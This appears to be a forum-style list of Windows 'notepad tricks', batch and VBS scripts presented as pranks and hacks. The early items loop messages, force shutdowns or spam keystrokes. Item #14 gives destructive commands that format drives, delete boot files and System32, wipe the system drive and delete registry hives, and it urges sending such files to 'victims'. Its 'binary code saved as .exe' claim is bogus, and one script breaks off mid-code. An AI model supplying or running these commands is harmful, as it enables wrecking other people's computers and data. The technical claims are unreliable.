#8. Constantly Repeat Messages
Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL
.). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
Open Notepad.
Paste the following code in the notepad file:
echo off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
#9. Shut-down The Computer After Conveying Any Message
This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:
Open Notepad.
Paste the following code in it:
echo off
msg * Its time to get some rest.
shutdown -c Error! You have to take rest! Byeeeeee -s
Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat
#10. Toggle Keyboard Button Simultaneously
Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks.
1. Caps Lock Key
Open Notepad.
Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys {CAPSLOCK}
loop
Save the file with anyname and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!
2. Hit Enter Key Continuously
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys ~(enter)
loop
Save the file with any name and .vbs extension and close it.
Now open the newly created file and see how the enter key behaves!
3.
Hit Backspace Key Continuously
Open Notepad.
Paste the following code in the notepad file:
MsgBox Lets Rumble
Set wshShell =wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys {bs}
loop
Save the file with any name and with .vbs extension and close it.
Now open the newly created file and see how the key behaves!
#11. Type You are a fool Continuously
Not much to explain, the title says it all! Follow the steps to make this trick work:
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop
Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type!
#12. Open Notepad continuously
Open Notepad.
Paste the following code in your notepad file:
echo off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again.
#13. Pick Your Option Batch File
When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below Action accompanied by number):
1 Shuts down the computer
2 Restarts the computer
3 Wipes out the hard drive
4 Net send
5 Shows a message & then shuts down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one elses on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
Open Notepad.
Paste the following code in the notepad file:
echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press x then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save the file with any name and with a .bat extension and close the file.
#14. IN THIS HACK I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD AND HOW TO DESTROY VICTIMS PC USING NOTEPAD. THIS IS REALLY COOL.
(A) STEP 1 :-
COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.
SAYS01001011000111110010010101010101010000011111100000
STEP 2 :-
SAVE AS AN .EXE ANY NAME WILL DO
STEP 3 :-
SEND THE .EXE TO PEOPLE AND INFECT
OR
IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET IT Secret. ANY WAY SOME MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE
FORMAT C:\ /Q/X THIS WILL FORMAT YOUR DRIVE C:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
FORMAT D:\ /Q/X THIS WILL FORMAT YOUR DIRVE D:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
FORMAT A:\ /Q/X THIS WILL FORMAT YOUR DRIVE A:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
DEL /F/S/Q C:\BOOT.INI THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
TRY TO FIGURE OUT URSELF REST
CANT SPOONFEED
ITS WORKING
DO NOT TRY IT ON YOUR PC. DONT MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY
STILL IF YOU CANT FIGURE IT OUT TRY THIS
GO TO NOTEPAD AND TYPE THE FOLLOWING:
(B)
echo OFF
DEL C:\ *.*|Y
SAVE IT AS DELL.BAT
WANT WORSE THEN TYPE THE FOLLOWING:
echo OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
AND SAVE IT AS A .BAT FILE
(C) HOW TO SHUTDOWN A COMPUTER FOREVER..
CODE:
echo OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
THIS WILL SHUT DOWN THE PERSONS COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND RESTART.
REMEMBER DO NOT OPEN THE FILE.
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
(D) A SIMPLE HACK TO DESTROY UR VICTIMS PC
I M HERE EXPLAIN TO MAKE A FILE THAT DESTROYS UR VICTIMS PC
I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.
1. OPEN NOTEPAD
2. WRITE THE ABOVE COMMAND : -
DEL C:\WINDOWS\SYSTEM32\*.*/Q
3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION .BAT OR .CMD AS U WANT
4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!
DONT DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.
WHY ?????? BCZ THE FILE U CREATED DELETE ALL FILES FROM UR
SYSTEM32 FOLDER AND WHEN U RESTART UR PC IT WILL NOT START
BCZ SYSTEM CAN NOT FIND THE FILES IN THE SYSTEM32 FOLDER WHICH
IS REQUIRED AT THE TIME OF BOOTING.
5. YOU CAN ALSO TEST THE ABOVE BY CREATING A FAKE FOLDER LET SUPPOSE
WINDOWS1 IN C:\. COPY SOME OLD FILES IN IT AND JUST FOLLOW THE
ABOVE COMMAND.BY DOUBLE CLICKING THE BAT OR CMD FILE UR ALL FILES
AUTOMAITCALLY GET DELETED.
6. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONES PC)
***MOST DANGEROUS NOTEPAD TRICK***
OPEN NOTEPAD
TYPE:
echo OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO YOUR COMPUTER HAS
BEEN FCKED.HAVE A
NICE DAY.
GOTO MESSAGE